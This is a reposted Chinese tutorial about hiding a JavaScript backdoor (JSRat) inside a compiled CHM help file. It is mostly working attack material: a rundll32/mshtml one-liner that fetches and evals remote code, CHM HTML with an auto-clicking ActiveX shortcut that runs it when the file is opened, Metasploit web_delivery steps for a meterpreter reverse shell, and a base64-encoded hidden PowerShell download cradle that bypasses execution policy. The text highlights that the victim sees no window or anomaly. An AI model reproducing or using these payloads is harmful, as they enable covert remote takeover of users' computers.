CHM + JSBackdoor捆绑后门

Posted journeyIT

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CHM + JSBackdoor捆绑后门相关的知识,希望对你有一定的参考价值。

使用交互模式的JSRat server:

#!bash
python MyJSRat.py -i 192.168.1.101 -p 8080

技术分享图片

访问 http://192.168.1.101:8080/wtf 获取攻击代码如下:

#!bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

经过多次测试,成功将以上命令写入chm,其Html代码为:

#!html
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
This is a demo ! <br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=‘,rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}‘>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

编译以后运行,可以成功获取JS交互shell:

 

技术分享图片

直接执行cmd /c command 是会有黑框的,可以使用run来避免显示黑框。执行run以后,输入 whoami > e:\1.txt 之后通过read 来获取回显。

2、获取meterpreter会话

此次测试获取meterpreter会话的方式是通过执行powershell命令,直接获取,当获取客户端JS 交互shell之后自动执行powershell命令,获取meterpreter会话。具体操作如下:

开启MSF web_delivery:

#!bash
 ~  msfconsole -Lq
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.101
lhost => 192.168.1.101
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(web_delivery) > set uripath /
uripath => /
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
msf exploit(web_delivery) >
[*] Started reverse TCP handler on 192.168.1.101:6666
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.101:8081/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring(‘http://192.168.1.101:8081/‘);

装有powershell的客户端执行以下命令则可获取meterpreter会话:

#!bash
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring(‘http://192.168.1.101:8081/‘);

由于存在特殊字符,我们可以把以上代码编码为base64格式,将以下代码存入power.txt

#!bash
$n=new-object net.webclient;
$n.proxy=[Net.WebRequest]::GetSystemWebProxy();
$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
IEX $n.downloadstring(‘http://192.168.1.101:8081/‘);

执行以下命令:

#!bash
cat power.txt | iconv --to-code UTF-16LE |base64

技术分享图片

最终要执行的powershell命令为:

#!bash
powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA==

使用执行命令模式直接获取meterpreter会话:

#!bash
python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA=="

测试过程中,从运行CHM到获取meterpreter,客户端无明显异常,全程无黑框弹出,获取到meterpreter会话如下图:

技术分享图片

目前我还没查到什么防御的姿势,知道的小伙伴可以分享一下。最好就是提高个人安全意识,对于这类文件,多注意一下,尽量别乱点,如果非要点,可以放到虚拟机里面。使用procexp.exe可以看到存在后门的chm文件会开启新的进程。

以上是关于CHM + JSBackdoor捆绑后门的主要内容,如果未能解决你的问题,请参考以下文章

图片后门捆绑利用工具 – FakeImageExploiter

图片后门捆绑利用工具 – FakeImageExploiter

图片后门恶意捆绑工具FackImageexploer

求怎么捆绑文件的方法或软件?

网页后门的网页后门和网页挂马

如何将捆绑从一个活动传递到放置在另一个活动中的片段?